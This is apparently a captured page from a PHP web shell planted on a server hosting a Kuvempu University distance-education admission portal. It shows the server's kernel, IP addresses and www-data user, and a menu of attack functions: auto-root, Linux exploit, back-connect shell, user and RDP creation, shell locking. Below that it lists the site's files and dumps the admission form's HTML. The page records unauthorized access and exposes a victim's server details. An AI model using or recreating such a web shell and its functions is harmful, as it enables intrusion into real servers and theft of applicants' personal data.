Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.226.187.224
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kusdde_tobedeleted /
adm /
[ HOME SHELL ]
Name
Size
Permission
Action
Paytm
[ DIR ]
drwxr-xr-x
Reports
[ DIR ]
drwxr-xr-x
adm_admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
documentation
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
maya-pdf
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
MainPage.html
42.46
KB
-rwxr-xr-x
MainPage.js
40.53
KB
-rwxr-xr-x
MainPage_2.html
34.17
KB
-rwxr-xr-x
Notification.pdf
1.24
MB
-rwxr-xr-x
Registrationpage.html
6.5
KB
-rwxr-xr-x
Reprint.html
7.53
KB
-rwxr-xr-x
Thumbs.db
3
KB
-rwxr-xr-x
admAppForm.html
9.88
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
appForm.html
16.39
KB
-rwxr-xr-x
appStatus2.html
12.3
KB
-rwxr-xr-x
cconfig.php
1.23
KB
-rwxr-xr-x
challan.html
8.38
KB
-rwxr-xr-x
chkResponse.php
434
B
-rwxr-xr-x
favicon.ico
1.83
KB
-rwxr-xr-x
h1.css
2.4
KB
-rwxr-xr-x
h1.html
5
KB
-rwxr-xr-x
h1.js
808
B
-rwxr-xr-x
homepage.html
8.52
KB
-rwxr-xr-x
index.html
10.01
KB
-rwxr-xr-x
index1.html
2.88
KB
-rwxr-xr-x
index2.html
5.09
KB
-rwxr-xr-x
index_15022018.html
10.01
KB
-rwxr-xr-x
lateral.pdf
401.08
KB
-rwxr-xr-x
logo.png
588.37
KB
-rwxr-xr-x
menubar.html
6.37
KB
-rwxr-xr-x
payment_gateway.php
7.78
KB
-rwxr-xr-x
paymentresponce.php
10.12
KB
-rwxr-xr-x
pgResponse.php
10.01
KB
-rwxr-xr-x
pgResponse22.php
9.59
KB
-rwxr-xr-x
pgResponse_.php
10.71
KB
-rwxr-xr-x
readmission.html
6.53
KB
-rwxr-xr-x
upload.php
393
B
-rwxr-xr-x
upload1.php
389
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MainPage.html
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <meta http-equiv="cache-control" content="max-age=0" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" /> <meta http-equiv="pragma" content="no-cache" /> <title>KUSDDE: Admission Panel</title> <!-- Favicon--> <link rel="icon" href="images/favicon.jpg" type="image/x-icon"> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Roboto:400,700&subset=latin,cyrillic-ext" rel="stylesheet" type="text/css"> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet" type="text/css"> <link href="plugins/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css"> <!-- Bootstrap Core Css --> <link href="plugins/bootstrap/css/bootstrap.css" rel="stylesheet"> <!-- Waves Effect Css --> <link href="plugins/node-waves/waves.css" rel="stylesheet" /> <!-- Animation Css --> <link href="plugins/animate-css/animate.css" rel="stylesheet" /> <!-- Wait Me Css --> <link href="plugins/waitme/waitMe.css" rel="stylesheet" /> <link href="plugins/sweetalert/sweetalert.css" rel="stylesheet" /> <link href="plugins/dropzone/dropzone.css" rel="stylesheet"> <!-- Custom Css --> <link href="css/style.css" rel="stylesheet"> <!-- AdminBSB Themes. You can choose a theme from css/themes instead of get all themes --> <link href="css/themes/all-themes.css" rel="stylesheet" /> </head> <body class="theme-cyan" onload="loadMasters()"> <!-- Page Loader --> <div class="page-loader-wrapper"> <div class="loader"> <div class="preloader"> <div class="spinner-layer pl-red"> <div class="circle-clipper left"> <div class="circle"></div> </div> <div class="circle-clipper right"> <div class="circle"></div> </div> </div> </div> <p>Please wait...</p> </div> </div> <!-- #END# Page Loader --> <!-- Top Bar --> <nav class="navbar"> <div class="container-fluid" style="color: #fff;"> <div class='col-md-12 m-t--5'> <center> <h2>KUVEMPU UNIVERSITY</h2> </center> <center> <h3 class="m-t--5">Admission Panel</h3> </center> <a href="#" onclick="homeLink()" style="float: right;margin-top: -25px; font-size:16px;color: #fff;">Home</a> </div> </div> </nav> <section class="content"> <div class="container-fluid"> <div class="tab-content" id="loadtab"> <!--///////Personal Details Card\\\\\\\--> <div class="row clearfix" id = "personal_det"> <div class="col-lg-10 col-md-12 col-sm-12 col-xs-12"> <div class="card"> <div class="header boder-top"> <span class="pull-right"> <b>Step 1 of 3</b></span> <h2>Personal Information</h2> </div> <div class="body" id="body"> <span style="display: none;color : red;" id = "verify_app"><center><h4>Verify Your Application</h4></center></span> <div class="field"> <div class="col-md-5"> <span id="regno"></span> <b>Full Name<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="studname_err"> Name is Required </span> <div class="form-line"> <input type="text" id="studname" class="form-control date" placeholder="Full Name" maxlength="60" onkeypress="return charKeydown(event);" style="text-transform: uppercase" autocomplete="off"> </div> </div> <b>Name of the Father/Guardian<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="fatname_err"> Father Name is Required </span> <div class="form-line"> <input type="text" id="fatname" class="form-control date" placeholder="Father's Name" maxlength="60" onkeypress="return charKeydown(event);" style="text-transform: uppercase" autocomplete="off"> </div> </div> <b>Religion<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="religion_err"> Religion is Required </span> <div class="form-line"> <input type="text" id="religion" class="form-control date" placeholder="Religion" maxlength="20" onkeypress="return charKeydown(event);" style="text-transform: uppercase" autocomplete="off"> </div> </div> <b>Category<span style="color: red;">*</span></b> <span class='fieldError' id="category_err"> Select category </span> <div class="p-b-20"> <select id="category" class="form-control"> </select> </div> <b>Gender<span style="color: red;">*</span></b> <span class='fieldError' id="gender_err"> Select Gender </span> <div class="demo-radio-button p-b-20" id="gender"> <input name="gender" type="radio" value="M" id="radio_1" autocomplete="off"/> <label for="radio_1">Male</label> <input name="gender" type="radio" id="radio_2" value="F" autocomplete="off"/> <label for="radio_2">Female</label> <input name="gender" type="radio" id="radio_3" value="T" autocomplete="off"/> <label for="radio_3">Transgender</label> </div> <b>Handicap<span style="color: red;">*</span></b> <span class='fieldError' id="handicap_err"> Select handicap or not </span> <div class="demo-radio-button p-b-20" id="handicap"> <input name="handicap" type="radio" id="radio_4" value="NONE" autocomplete="off"/> <label for="radio_4">None</label> <input name="handicap" type="radio" id="radio_5" value="PHC" autocomplete="off"/> <label for="radio_5">PHC</label> <input name="handicap" type="radio" id="radio_6" value="VHC" autocomplete="off"/> <label for="radio_6">VHC</label> </div> <b>Nationality<span style="color: red;">*</span></b> <span class='fieldError' id="nationality_err"> Select your nationality </span> <div class="demo-radio-button p-b-20" id="nationality"> <input name="nationality" type="radio" id="INDIAN" value="INDIAN" autocomplete="off"/> <label for="INDIAN">Indian</label> <input name="nationality" type="radio" id="OTHERS" value="OTHERS" autocomplete="off"/> <label for="OTHERS">Others</label> </div> <span id='finstn' style="display: none;color: red;"><p>Contact University office with all necessary documents for verification</p></span> <div class="col-md-8 m-l--15"> <b>Date Of Birth<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="dob_err"> Date Of Birth is required </span> <div class="form-line daterange"> <input type="text" id="dob" class="form-control date" placeholder="dd/mm/yyyy" autocomplete="off"> </div> </div> <b>Aadhar Number<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="adhar_err"> Aadhar Number is required </span> <div class="form-line"> <input type="text" id="adhar" class="form-control" placeholder="Aadhar Number" onkeypress="return acceptNumbersOnlyForModule(event);" maxlength="12" autocomplete="off"> </div> </div> </div> </div> </div> <!--///////Photo Upload\\\\\\\--> <div class="col-md-3 col-md-offset-1" > <b>Photo<span style="color: red;">*</span></b> <span class='fieldError' id="photo_err"> Upload photo </span> <form action="upload1.php" id="frmFileUpload" class="dropzone" method="post" enctype="multipart/form-data" style="min-height: 220px;max-width: 190px"> <div class="dz-message p-t-60"> <b>Click to upload<br> Photo</b> </div> <div class="fallback"> <input name="file" type="file"/> </div> </form> <img id="studphoto" style="min-height: 220px;max-width: 190px;padding: 3px; border: 1px dashed red;" hidden="hidden"> </div> <div class="col-md-3 p-t-20"> <p id="photomsg1" style="text-align: justify;">Upload clearly visible photo having a width of 190 pixels and height of 220 pixels</p> </div> <div class="col-md-3"> <p id="photomsg2">Maximum size allowed is 100kb</p> </div> <div class="col-md-5"> </div> <!--///////Signature upload\\\\\\\--> <div class="col-md-3 col-md-offset-1" id='signdiv'> <b>Signature<span style="color: red;">*</span></b> <span class='fieldError' id="sign_err"> Upload Signature </span> <form action="upload.php" id="signatureUpload" class="dropzone" method="post" enctype="multipart/form-data" style="min-height: 80px;max-width:190px;"> <div class="dz-message"> <b>Click to upload Signature</b> </div> <div class="fallback"> <input name="file" type="file"/> </div> </form> <img id="studsign" style="min-height: 50px;max-width: 190px;padding: 3px; border: 1px dashed red;" hidden="hidden"> </div> <div class="row clearfix" > <div class="col-md-3 p-t-20" id='signmsgdiv'> <p style="text-align: justify;">Ensure a clearly visible image of your signature with width of 190 pixels and height of 50 pixels</p> </div> </div> <div class="col-md-5"> <b>Permanent Address<span style="color: red;">*</span></b> <span class='fieldError' id="padd1_err"> All fields in Address are required </span> <div class="form-group p-b-10" style="padding-top:12px;"> <div class="form-line"> <input type="text" id="padd1" class="form-control" placeholder="Address Line - 1" maxlength="40" autocomplete="off"> </div> </div> <div class="form-group p-b-10"> <div class="form-line"> <input type="text" id="padd2" class="form-control" placeholder="Address Line - 2" maxlength="40" autocomplete="off"> </div> </div> <div class="form-group p-b-10"> <div class="form-line"> <input type="text" id="padd3" class="form-control" placeholder="Address Line - 3" maxlength="40" autocomplete="off"> </div> </div> <div class="form-group p-b-10 m-l--15 col-md-6"> <div class="form-line"> <input type="text" id="pdistrict" class="form-control" placeholder="District" maxlength="30" onkeypress="return charKeydown(event);" autocomplete="off"> </div> </div> <div class="form-group pull-right m-r--15 col-md-6"> <div class="form-line"> <input type="text" id="ppincode" class="form-control" placeholder="Pincode" onkeypress="return acceptNumbersOnlyForModule(event);" maxlength="6" autocomplete="off"> </div> </div> <div class="form-group"> <div class="form-line p-b-20"> <input type="text" id="pstate" class="form-control" placeholder="State" maxlength="30" onkeypress="return charKeydown(event);" autocomplete="off"> </div> </div> </div> <div class="row clearfix"> <div class="col-md-5 col-md-offset-1"> <b>Communication Address<span style="color: red;">*   </span> </b> <input type="checkbox" id="basic_checkbox_1" onchange="autoFilladd()" autocomplete="off"/> <label for="basic_checkbox_1" class="font-6">Same as Permanent Address?</label> <div class="form-group p-b-10"> <span class='fieldError' id="cadd1_err"> All fields in Address are required </span> <div class="form-line"> <input type="text" id="cadd1" class="form-control" placeholder="Address Line - 1" maxlength="40" autocomplete="off"> </div> </div> <div class="form-group p-b-10"> <div class="form-line"> <input type="text" id="cadd2" class="form-control" placeholder="Address Line - 2" maxlength="40" autocomplete="off"> </div> </div> <div class="form-group p-b-10"> <div class="form-line"> <input type="text" id="cadd3" class="form-control" placeholder="Address Line - 3" maxlength="40" autocomplete="off"> </div> </div> <div class="form-group p-b-10 m-l--15 col-md-6"> <div class="form-line"> <input type="text" id="cadistrict" class="form-control" placeholder="District" maxlength="30" onkeypress="return charKeydown(event);" autocomplete="off"> </div> </div> <div class="form-group pull-right m-r--15 col-md-6"> <div class="form-line"> <input type="text" id="cpincode" class="form-control" placeholder="Pincode" onkeypress="return acceptNumbersOnlyForModule(event);" maxlength="6" autocomplete="off"> </div> </div> <div class="form-group"> <div class="form-line p-b-20"> <input type="text" id="castate" class="form-control" placeholder="State" maxlength="30" onkeypress="return charKeydown(event);" autocomplete="off"> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-md-5 m-l-15"> <b>Mobile Number<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="mobile_err"> Mobile number is required </span> <div class="form-line"> <input type="text" id="mobile" class="form-control" placeholder="Mobile" onkeypress="return acceptNumbersOnlyForModule(event);" maxlength="10" autocomplete="off"> </div> </div> <b>LandLine Number(with STD code)</b> <div class="form-group p-b-20"> <div class="form-line"> <input type="text" id="landline" class="form-control" placeholder="Land Line (Optional)" onkeypress="return acceptNumbersOnlyForModule(event);" maxlength="15" autocomplete="off"> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-md-5 m-l-15"> <b>Email Address<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="email_err"> Email Address is required </span> <span class='fieldError' id="emailval_err"> The Email ID format is invalid </span> <div class="form-line"> <input type="text" id="email" class="form-control" placeholder="Email Address" maxlength="30" autocomplete="off"> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-md-5 m-l-15"> <b>Occupation<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="ocupation_err"> Occupation is required </span> <div class="form-line"> <input type="text" id="ocupation" class="form-control" placeholder="Occupation" maxlength="30" onkeypress="return charKeydown(event);" autocomplete="off"> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-md-5 m-l-15"> <b>Annual Income<span style="color: red;">*</span></b> <div class="form-group"> <span class='fieldError' id="income_err"> Annual Income is required </span> <div class="form-line"> <input type="text" id="income" class="form-control" placeholder="Income" maxlength="20" onkeypress="return acceptNumbersOnlyForModule(event);" autocomplete="off"> </div> </div> </div> </div> </div> <div class="footer"> <center> <button type="button" class="btn btn-primary waves-effect btn-lg" onclick = "Showsubdetl()">Next</button> </center> </div> </div> </div> </div> </div> <!--///////Subject Card\\\\\\\--> <div class="row clearfix" id = "subject_det"> <div class="col-lg-10 col-md-12 col-sm-12 col-xs-12"> <div class="card"> <div class="header boder-top"> <span class="pull-right"> <b>Step 2 of 3</b> </span> <h2>Course Selection </h2> </div> <div class="body" id="subcarddiv"> <div class="row clearfix" id='mediumdiv'> <div class="col-md-4" id = "graduationdiv"> <b>Graduation / Diploma<span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="graduation_err"> Graduation / Diploma is required </span> <div class="form-line"> <select id = "graduation" class="form-control" onchange = "getdegreedetails()"> <option value=""> -Select- </option> <option value="pg" >P.G (Post Graduation)</option> <option value="ug">U.G (Under Graduation)</option> <option value="pgd">P.G.D (Post Graduation Diploma)</option> </select> </div> </div> </div> <div class="col-md-4" id='coursediv'> <b>Course <span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="course_err"> Course is required </span> <div class="form-line"> <select disabled id = "degree" class="form-control" onchange = "getcombinationdetails()"> </select> </div> </div> </div> <div class="col-md-4" id = "subjectdiv"> <b>Subject <span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="subject_err"> Subject is required </span> <div class="form-line"> <select disabled id = "subject" class="form-control" onchange = "getoptionsdetails()"> </select> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-md-4"> <b>Medium <span style="color: red;">*</span></b> <div class="form-group"> <span class='fieldError' id="medium_err"> Medium is required </span> <div class="form-line"> <select id = "moi" class="form-control"> <option value=""> -Select- </option> <option value="KANNADA" >Kannada</option> <option value="ENGLISH">English</option> <option value="HINDI">Hindi</option> </select> </div> </div> </div> <div class="col-md-4" id = "optionsdiv"> <b>Optional Subject<span style="color: red;">*</span></b> <div class="form-group"> <span class='fieldError' id="options_err"> Options is required </span> <div class="form-line"> <select id = "options1" class="form-control" onchange = "getsubjectdetails()"> </select> </div> </div> </div> </div> <div id = "subjectdet" class="row clearfix"> <div class="col-md-12"> <center><h4>Paper Detail of selected Course</h4></center> <div class="form-group"> <div class="form-line"> <div id = "subdet"></div> </div> </div> </div> </div> <div id="centerSelection"> <div class="row clearfix"> <center><h4>Selection of Study Center</h4></center> <div class="col-md-4 col-md-offset-2"> <b>State <span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="state_err"> State is required </span> <div class="form-line"> <select id = "cstate" class="form-control"> <option value=""> -Select- </option> <option value="Karnataka" >Karnataka</option> </select> </div> </div> </div> <div class="col-md-4"> <b>District <span style="color: red;">*</span></b> <div class="form-group p-b-20"> <span class='fieldError' id="district_err"> District is required </span> <div class="form-line"> <select id = "cdistrict" class="form-control"> <option value=""> -Select- </option> <option value="Shimoga" >Shimoga</option> </select> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-md-8 col-md-offset-2"> <b>Counselling Center Name <span style="color: red;">*</span></b> <div class="form-group"> <span class='fieldError' id="counselling_err"> Counselling Center Name is required </span> <div class="form-line"> <select id = "centercode" class="form-control"> </select> </div> </div> </div> </div> </div> </div> <div class="footer"> <div class="p-l-100"> <center> <button type="button" class="btn btn-primary waves-effect btn-lg" onclick = "Showperdetl()">Previous </button> <button type="button" class="m-l-40 btn btn-primary waves-effect btn-lg m-l-8" onclick = "Showfeedetl()">Next </button> </center> </div> </div> </div> </div> </div> <!--/////////Fee Details\\\\\\\\ --> <div class="row clearfix" style="display: ;" id = "fee_det"> <div class="col-lg-10 col-md-12 col-sm-12 col-xs-12"> <div class="card"> <div class="header boder-top"> <span class="pull-right"> <b>Step 3 of 3</b> </span> <h2 id = "def">Details of Eligibility Exam / Fee Payment </h2> <h2 id = "dee">Details of Eligibility Exam</h2> </div> <div class="body"> <div class="row clearfix" id="prev1"> <div class="col-md-3"> <b>Eligibility Exam Passed</b> <div class="form-group p-b-20"> <span class='fieldError' id="qaldeg_err"> Eligibility Exam Passed is required </span> <div class="form-line"> <input type = 'text' class="form-control" id = "qaldeg" autocomplete="off"> </div> </div> </div> <div class="col-md-4"> <b>Combination / Subject Studied</b> <div class="form-group p-b-20"> <span class='fieldError' id="qalsub_err"> Combination is required </span> <div class="form-line"> <input type = 'text' class="form-control" id = "qalsub" autocomplete="off"> </div> </div> </div> <div class="col-md-4"> <b>Electives / If Any</b> <div class="form-group p-b-20"> <div class="form-line"> <input type = 'text' class="form-control" id = "qaloption" autocomplete="off"> </div> </div> </div> </div> <div class="row clearfix" id="ceninst" style="display: none;"> <div class="col-md-offset-2 col-md-8"> <b>Centre Name</b> <div class="form-group"> <div class="form-line"> <div> <input type = 'text' class="form-control col-md-8" id = "ceninstitut" autocomplete="off" disabled="disabled"> </div> </div> </div> </div> </div> <div class="row clearfix" id="prev2"> <div class="col-md-3"> <b>Register Number</b> <div class="form-group p-b-20"> <span class='fieldError' id="qalreg_err"> Register Number is required </span> <div class="form-line"> <input type = 'text' class="form-control" id = "qalreg" autocomplete="off"> </div> </div> </div> <div class="col-md-4"> <b>Month & Year of Passing</b> <div class="form-group m-l--15"> <span class='fieldError' id="qalpassyear_err"> Month & Year of Passing is required </span> <div class="form-line col-md-6"> <select id="qalpassmonth" class="form-control" autocomplete="off"> <option selected="selected" value="0">- Month -</option> <option value='January' >January</option> <option value='February'>February</option> <option value='March'>March</option> <option value='April'>April</option> <option value='May'>May</option> <option value='June'>June</option> <option value='July'>July</option> <option value='August'>August</option> <option value='September'>September</option> <option value='October'>October</option> <option value='November'>November</option> <option value='December'>December</option> </select> </div> </div> <div class="form-line"> <div class="form-line col-md-6"> <select id = "qalpassyear" class="form-control"> </select> </div> </div> </div> <div id = "passuniv" class="col-md-5"> <b calss = 'col-md-6'>From which University the applying course is unfinished</b> <div class="form-group m-l--15"> <span class='fieldError' id="qalpassyear_err"> University is Required </span> <div class="form-line col-md-6"> <select id="fpassuniv" class="form-control" autocomplete="off"> <option selected="selected" value="">- Select -</option> <option value='KUVEMPU UNIVERSITY' >KUVEMPU UNIVERSITY</option> <option value='OTHER UNIVERSITY'>OTHER UNIVERSITY</option> </select> </div> </div> </div> </div> <div class="row clearfix" id='prev3'> <div class="col-md-6"> <b>College/Institution/University where you studied (Including Place Name)</b> <div class="form-group"> <span class='fieldError' id="qalinstitut_err"> College is required </span> <div class="form-line"> <div> <input type = 'text' class="form-control" id = "qalinstitut" autocomplete="off"> </div> </div> </div> </div> <div class="col-md-4" id = "lyear"> <b>Lateral Entry Year</b> <div class="form-group"> <div class="form-line"> <select id="year" class="form-control" autocomplete="off"> <option selected="selected" value="">- Select -</option> <option value='B' >Second Year</option> <option value='C'>Third Year</option> </select> </div> </div> </div> </div> <div id = "feedetl" class="row clearfix"> <center><h4>Fee Details</h4></center> <div class="col-md-4 col-md-offset-2"> <b>Total Amount</b> <span class='fieldError' id="sum_err"> Fees Not defined Contact University </span> <div class="form-group"> <div class="form-line"> <input type = 'text' id = "sum" class="form-control col-md-4" disabled > </div> </div> </div> <div class="col-md-4"> <b>Payment Type</b> <div class="form-group"> <span class='fieldError' id="paymenttype_err"> Payment type is required </span> <div class="form-line"> <select id = "paymenttype" class="form-control"> </select> </div> </div> </div> </div> <div class="row clearfix"> </div> </div> <div class="footer"> <center> <button type="button" class="btn btn-primary waves-effect btn-lg" onclick = "Showsubdetl()">Previous</button> <button type="button" class="m-l-20 btn btn-primary waves-effect btn-lg" onclick = "saveDetails()">Submit</button> </center> </div> </div> </div> </div> <!---////////Application Status Card \\\\\\--> <div class="row clearfix" id = "success_card"> <div class="col-lg-10 col-md-12 col-sm-12 col-xs-12 m-l--50"> <div class="card"> <div class="header boder-top"> <h2>Application Status</h2> </div> <div class="body"> <div class="row clearfix"> <div class="col-md-12" id = "sbmchallan"> <center> <b><span id="app_msg"></span></b><br><br> <b>Application Number: <span id="app_no"></span></b><br><br> <b>Click here generate a copy of Application & Bank Challan</b> <br><br> <button id="challanBtn" type="button" class="btn btn-primary waves-effect btn-lg" onclick = "challanGenerate()">Generate Challan</button> </center> </div> <div class="col-md-12" id = "makepayment"> <center> <b><span id="app_msg"></span></b><br><br> <b>Application Number: <span id="dapp_no"></span></b><br><br> <button id="paytmBtn" type="button" class="btn btn-primary waves-effect btn-lg" onclick = "challanGenerate()">Make Payment</button> </center> </div> </div> </div> </div> </div> </div> </div> </div> </section> <script src="js/appForm.js"></script> <script src="js/control.js"></script> <script src="js/validate.js"></script> <script src="js/MainPage.js?v=22" type="text/javascript"></script> <!-- Jquery Core Js --> <script src="plugins/jquery/jquery.min.js"></script> <!-- Bootstrap Core Js --> <script src="plugins/bootstrap/js/bootstrap.js"></script> <!-- Slimscroll Plugin Js --> <script src="plugins/jquery-slimscroll/jquery.slimscroll.js"></script> <script src="plugins/jquery-blockUI/jquery.blockUI.js"></script> <!-- Waves Effect Plugin Js --> <script src="plugins/node-waves/waves.js"></script> <script src="plugins/jquery-validation/jquery.validate.js"></script> <script src="plugins/jquery-steps/jquery.steps.js"></script> <script src="js/pages/forms/form-wizard.js"></script> <script src="plugins/sweetalert/sweetalert.min.js"></script> <!-- Autosize Plugin Js --> <script src="js/form_submit.js"></script> <!-- Input Mask Plugin Js --> <script src="plugins/jquery-inputmask/jquery.inputmask.bundle.js"></script> <script src="plugins/dropzone/dropzone.js"></script> <script src="plugins/bootstrap-tagsinput/bootstrap-tagsinput.js"></script> <script src="plugins/jquery-validation/jquery.validate.js"></script> <script src="plugins/jquery-steps/jquery.steps.js"></script> <script src="plugins/sweetalert/sweetalert.min.js"></script> <script src="js/masonry.pkgd.min.js"></script> <!-- Custom Js --> <script src="js/admin.js"></script> <script src="js/appStatus.js"></script> <!-- Demo Js --> <script src="js/demo.js"></script> <script src="js/pages/forms/form-wizard.js"></script> <script src="js/pages/forms/advanced-form-elements.js"></script> <script type="text/javascript"> $(function() { $("li").click(function() { // remove classes from all $("li").removeClass("active"); // add class to the one we clicked $(this).addClass("active"); }); }); </script> <script type="text/javascript"> $('#statusDetl').addClass("hidden"); var $demoMaskedInput = $('.daterange'); //Date $demoMaskedInput.find('.date').inputmask('dd/mm/yyyy', { placeholder: '__/__/____' }); //$('#adhar').inputmask('9999 9999 9999', { placeholder: '____ ____ ____' }); //$('#mobile').inputmask('+99 (999) 999-99-99', { placeholder: '+__ (___) ___-__-__' }); //$('#email').inputmask({ alias: "email" }); //$('#income').inputmask('99,99 €', { placeholder: '__,__ €' }); /*$("#S4").keypress(function (e){ var key = e.which; if(key == 13) // the enter key code { getDetails(); } });*/ $(document).ready(function () { var inputs = $('input, select').keypress(function (e) { if (e.which == 13) { e.preventDefault(); var nextInput = inputs.get(inputs.index(this) + 1); if (nextInput) { nextInput.focus(); } } }); $('input[type=radio][name=group3]').change(function() { if (this.value == 'OTHERS') { $('#finstn').css('display','block'); } else if (this.value == 'INDIAN') { $('#finstn').css('display','none'); } }); }); </script> </body> </html>
Close